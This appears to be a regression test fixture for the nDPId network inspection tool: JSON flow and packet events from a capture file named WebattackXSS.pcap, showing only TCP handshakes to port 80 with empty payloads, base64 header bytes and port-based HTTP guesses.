+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6706,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":2,"flow_last_seen":1499347771635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7VoJ3i\/mcbB2O6AScSCH4AAAAgQFtAQCCAoD5cp+ATv5CQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6707,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":3,"flow_last_seen":1499347771636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347771636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jzRAAD4GNqSsEAABwKgKMu1aAFBxsHY7Cd4v54AQAOUm6AAAAQEICgE7+QkD5cp+"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347774205,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347774205,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pr5AAD4GHxKsEAABwKgKMu10AFBYS10yAAAAAKACchC++QAAAgQFtAQCCAoBO\/uMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":2,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7XSGo4hpWEtdM6AScSDf5QAAAgQFtAQCCAoD5c0AATv7jAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":3,"flow_last_seen":1499347774205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pr9AAD4GHxmsEAABwKgKMu10AFBYS10zhqOIaoAQAOV+7QAAAQEICgE7+4wD5c0A"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347775487,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347775487,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kr1AAD4GMxOsEAABwKgKMu2CAFDDYm5xAAAAAKACchBBVQAAAgQFtAQCCAoBO\/zMAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":2,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7YJb\/j+gw2JucqAScSDUbgAAAgQFtAQCCAoD5c5BATv8zAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":3,"flow_last_seen":1499347775487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kr5AAD4GMxqsEAABwKgKMu2CAFDDYm5yW\/4\/oYAQAOVzdgAAAQEICgE7\/MwD5c5B"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347776753,"flow_last_seen":1499347776753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347776753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1499347776753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KqpAAD4GmyasEAABwKgKMu2QAFCtQdSjAAAAAKACchDv+AAAAgQFtAQCCAoBO\/4JAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":2,"flow_last_seen":1499347776754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776754,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7ZCBpSP4rUHUpKAScSB31wAAAgQFtAQCCAoD5c99ATv+CQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":3,"flow_last_seen":1499347776754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347776754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KqtAAD4Gmy2sEAABwKgKMu2QAFCtQdSkgaUj+YAQAOUW3wAAAQEICgE7\/gkD5c99"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347779333,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347779333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eChAAD4GTaisEAABwKgKMu2qAFDZQnimAAAAAKACchAdVgAAAgQFtAQCCAoBPACOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":2,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7aoAKzpS2UJ4p6AScSAN0AAAAgQFtAQCCAoD5dICATwAjgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":3,"flow_last_seen":1499347779333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eClAAD4GTa+sEAABwKgKMu2qAFDZQninACs6U4AQAOWs1wAAAQEICgE8AI4D5dIC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347780605,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347780605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Kg9AAD4Gm8GsEAABwKgKMu24AFBtBSvDAAAAAKACchDVKgAAAgQFtAQCCAoBPAHMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":2,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7bgVufFFbQUrxKAScSD35AAAAgQFtAQCCAoD5dNAATwBzAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":3,"flow_last_seen":1499347780605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KhBAAD4Gm8isEAABwKgKMu24AFBtBSvEFbnxRoAQAOWW7AAAAQEICgE8AcwD5dNA"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 